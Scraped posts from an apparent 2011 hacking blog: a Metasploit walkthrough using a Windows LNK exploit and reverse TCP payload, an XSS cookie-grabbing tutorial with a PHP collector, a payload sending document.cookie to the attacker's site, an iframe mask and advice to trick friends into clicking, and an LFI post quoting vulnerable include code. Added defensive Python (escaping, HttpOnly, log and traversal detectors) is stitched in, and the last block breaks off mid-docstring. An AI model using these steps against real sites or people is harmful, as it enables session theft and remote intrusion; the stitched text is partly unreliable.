<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then search for the windows lnk exploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Msf>search
lnk<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then it shows the exploit<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">exploit/xxxxx/xxxxxr/xxxxx_dllloader<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><o:p></o:p></span></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>use
exploitname</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> (type the exploit name shown above)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">set <b>SRVHOST</b><span> </span>to your local IP to get the
connection back.</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Then set payload<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">The shell/reverse_tcp payload works in most cases,<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">so type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>set
payload windows/metxxxxx/xxx_tcp<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then set LHOST
to your local IP<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>exploit<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">you will be shown a URL or address with a port
number; give it to your friend.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">tada !<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">wait for the reverse connection.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">---------------------------------------------------</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> I'm not responsible for your actions; this is for
educational purposes only.<o:p></o:p></span></b></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-92040623320206011232011-10-25T00:56:00.000-07:002011-10-25T00:56:46.082-07:00Cookie Grabbing using XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">XSS (Cross-site Scripting) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">There are two types of XSS : Non-Persistent and
Persistent.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">If you need to know more about persistent and
non-persistent XSS, click </span></span><a href="http://mimmoo.wordpress.com/2011/06/19/xss-persistent-and-xss-non-persistent/"><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">here</span></a><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Searching for the vulnerability in a site is up to you.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Here is a simple example:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><script>alert("hi");</script><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxKNxhKYArnEmHxd-Phm5kiLfUwBX3rtHY4cuRsnUlK_oX0Q1sO1uzMi7ZGPYnxpmGnQ2NVlkvLJZrFNCzlwts8fW9JnX2NDV5FSotA5xMh5ApV7VrTmCXCAvSMO_M2MxxHf7XdClmlec/s1600/x1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxKNxhKYArnEmHxd-Phm5kiLfUwBX3rtHY4cuRsnUlK_oX0Q1sO1uzMi7ZGPYnxpmGnQ2NVlkvLJZrFNCzlwts8fW9JnX2NDV5FSotA5xMh5ApV7VrTmCXCAvSMO_M2MxxHf7XdClmlec/s640/x1.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";">Make sure
that you have a site to which the cookies can be uploaded.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";">(This is where the
link has to point and where the script sends its data.)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Upload the PHP script below to your site, e.g. as 1.php:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><?php<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">$cookie=$_GET['cookie'];<span> </span>//storing the cookie string in a variable called
$cookie.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">$file=fopen("cookies.txt","a");<span> </span>//opening a file called cookies.txt in
append mode.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">fwrite($file,$cookie."\n\n\n");<span> </span>//appending the cookie string followed by blank lines.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">fclose($file);<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">?><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Save it as "<b>1.php</b>".<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now the url
looks like : <b>www.your_site.com/some_folder/1.php</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;">Once you have found a vulnerable parameter in a site, put it together like this:</span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script></span></b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;"> </span><span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">Now send this link, but most people won't click
it because they find the URL very suspicious.</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">So you need to mask it.</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;"><br /></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">Ex:</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
</div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><iframe</span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>"
width="1" heigth="1"></iframe><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">**<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now put this snippet in a file called <b>iclick.php</b>.<b><o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now your url looks like <b>www.your_site.com/folder/iclick.php</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Send this link to your friend or anyone else and ask them (social
engineering) to click on it.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">That's it: the cookies will be stored in the cookies.txt
file.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">(Download a cookie editor add-on and go on with what you
want to do.)<o:p></o:p></span></span></div>
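<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Seen from the defending side, the grab above only works because search.php reflects the query parameter into the page unescaped and because the session cookie is readable from JavaScript. The Python below is an added example, not code from the original post: it stands in for the PHP page (assumed names render_search_unsafe / render_search_safe), shows the unsafe reflection next to the entity-encoded one, builds a Set-Cookie header with HttpOnly so document.cookie cannot reach the session, and runs a simple detector over a few constructed Apache-style access-log lines (the attacker host is replaced by example.invalid). Only the Python 3 standard library is used.</span></span></div>

```python
import html
import re
from http import cookies
from urllib.parse import unquote

# Vulnerable reflection (stand-in for search.php): the search term goes
# into the HTML untouched, so "<script>...</script>" in ?query= becomes
# live markup in the victim's browser.
def render_search_unsafe(query: str) -> str:
    return f"<p>Results for {query}</p>"

# Hardened reflection: every HTML metacharacter is entity-encoded, so the
# browser displays the text "<script>" instead of executing it.
def render_search_safe(query: str) -> str:
    return f"<p>Results for {html.escape(query, quote=True)}</p>"

# Session cookie with HttpOnly (not exposed through document.cookie),
# Secure (sent over HTTPS only) and SameSite=Strict (not sent cross-site).
def session_cookie_header(session_id: str) -> str:
    jar = cookies.SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Strict"
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()

# Detection: flag request targets that, once URL-decoded, carry a script
# tag or a reference to document.cookie / document.location.
XSS_MARKERS = re.compile(r"<\s*script|document\.cookie|document\.location", re.I)

def find_reflected_xss(log_lines):
    """Return the decoded request targets that match the markers above."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        target = unquote(m.group(1))
        if XSS_MARKERS.search(target):
            hits.append(target)
    return hits

# Constructed sample log lines (Apache combined format). The second one is
# the URL-encoded form of the reflected payload discussed in the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Oct/2011:00:56:46 -0700] "GET /somefolder/search.php?query=shoes HTTP/1.1" 200 1532',
    '203.0.113.9 - - [25/Oct/2011:00:57:02 -0700] "GET /somefolder/search.php?query=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fexample.invalid%2F1.php%3Fcookie%3D%27.concat(escape(document.cookie))%3B%3C%2Fscript%3E HTTP/1.1" 200 1601',
    '203.0.113.7 - - [25/Oct/2011:00:58:11 -0700] "GET /index.php HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    probe = '<script>alert("hi");</script>'
    print("unsafe:", render_search_unsafe(probe))
    print("safe:  ", render_search_safe(probe))
    print("Set-Cookie:", session_cookie_header("abc123"))
    for hit in find_reflected_xss(SAMPLE_LOG):
        print("suspicious request:", hit)
```

<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Output encoding is the fix for the injection itself; HttpOnly does not stop XSS but takes the cookie out of reach of injected script, which is exactly what the 1.php collector depends on. The log check is deliberately coarse and is meant as a starting point for an alert, not as a filter.</span></span></div>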
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> *** I'm not responsible for your actions. This is
just for educational purposes only.</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><o:p></o:p></span></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com3tag:blogger.com,1999:blog-7651709861170417818.post-6163440543085293932011-10-18T11:35:00.000-07:002015-05-20T05:12:13.071-07:00LFI (Local File Inclusion)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="border-bottom: solid #AAAAAA 1.0pt; border: none; mso-border-bottom-alt: solid #AAAAAA .75pt; mso-element: para-border-div; padding: 0in 0in 0in 0in;">
<h1 style="border: none; margin-bottom: 1.2pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-border-bottom-alt: solid #AAAAAA .75pt; mso-line-height-alt: 14.4pt; mso-padding-alt: 0in 0in 0in 0in; padding: 0in;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: large;"><span class="Apple-style-span" style="-webkit-text-size-adjust: none; background-color: white; font-family: Arial, Helvetica, 'Nimbus Sans L', sans-serif; line-height: 15px;">LFI bounce using chunked transfer encoding</span></span></h1>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Local File Inclusion (<i>also known as LFI</i>)
is the process of including files on a server through the web browser. This
vulnerability occurs when a page include is not properly sanitized, and allows
directory traversal characters to be injected.<o:p></o:p></span></span></div>
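<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The missing check the paragraph refers to, as an added example that is not part of the original post: a Python stand-in (assumed function names, assumed pages directory /var/www/app/pages) for a page-include handler. It contrasts the raw concatenation the vulnerable code performs with an allowlisted name plus a canonical-path check, and adds a small detector that URL-decodes a raw parameter value and looks for traversal markers, which is the kind of test a log review or WAF rule would apply. Only the Python 3 standard library is used.</span></span></div>

```python
import os
import re
from urllib.parse import unquote

# Assumed location of the includable pages (stand-in for the PHP "pages/" folder).
PAGES_DIR = "/var/www/app/pages"

# Allowlist: a page name is a short token of letters, digits, '_' or '-'.
# No '/', '\\', '.', '%' or NUL can get through, so traversal is impossible.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

def include_path_unsafe(user_value: str) -> str:
    """Mirrors include("pages/$file"): the user value is glued straight onto the directory."""
    return PAGES_DIR + "/" + user_value

def resolve_page(user_value: str, pages_dir: str = PAGES_DIR):
    """Return the canonical file to include, or None when the request must be refused."""
    if not PAGE_NAME.fullmatch(user_value):
        return None
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + ".php"))
    # Defence in depth: even if the allowlist were loosened later, refuse anything
    # whose canonical path escapes the pages directory (symlinks included).
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def looks_like_traversal(raw_value: str) -> bool:
    """Detection helper: decode repeatedly (double encoding) and look for traversal markers."""
    decoded = raw_value
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return "../" in decoded or "..\\" in decoded or "\x00" in decoded

if __name__ == "__main__":
    # Constructed sample values as a client might send them in ?file=
    for value in ["about", "../../../../etc/passwd", "..%2F..%2Fetc%2Fpasswd", "about%00"]:
        print(f"{value!r:32} unsafe -> {include_path_unsafe(unquote(value))!r}")
        print(f"{'':32} safe   -> {resolve_page(unquote(value))!r}   "
              f"traversal? {looks_like_traversal(value)}")
```

<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The allowlist alone is sufficient; the realpath comparison is there so that a later change to the pattern (for example allowing subfolders) cannot silently reopen the hole. Rejecting with None and serving a fixed error page is preferable to "cleaning" the value, since stripping "../" once can be bypassed by "....//".</span></span></div>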
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The vulnerable code looks like:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div style="background: #F9F9F9; border: dashed #2F6FAB 1.0pt; mso-border-alt: dashed #2F6FAB .75pt; mso-element: para-border-div; padding: 12.0pt 12.0pt 12.0pt 12.0pt;">
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; padding: 0in;"><?php
 $file = $_GET['file'];
 if(isset($file))
 {
     include("pages/$file");
 }
 else
 ……….
 ……..
 ?></pre>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">From the code you can see that it includes a file from the
local filesystem, using a path taken straight from the request without any check.</span></span></div>
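<div class="MsoNormal" style="text-align: justify;">
<span style="color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">What the include above is missing is a containment check on the requested path before it is opened. The function below is an added example, not code from the original post, written in Python (the language of fimap, used later in this post) and mirroring what the PHP include should do: join the request value to a fixed base directory, resolve it with realpath(), and accept it only if the result is still inside that directory and ends in .php. The demo() helper, its temporary pages/ tree, the file names and the probe strings are all constructed for this example. The symlink probe goes beyond the cases in the post: a link inside pages/ that points outside is also refused, because realpath() follows it.</span></div>

```python
"""Containment check for a user-supplied include path.

Added example, not code from the original post. Mirrors in Python the checks the
PHP include above is missing. The demo() tree, file names and probe strings are
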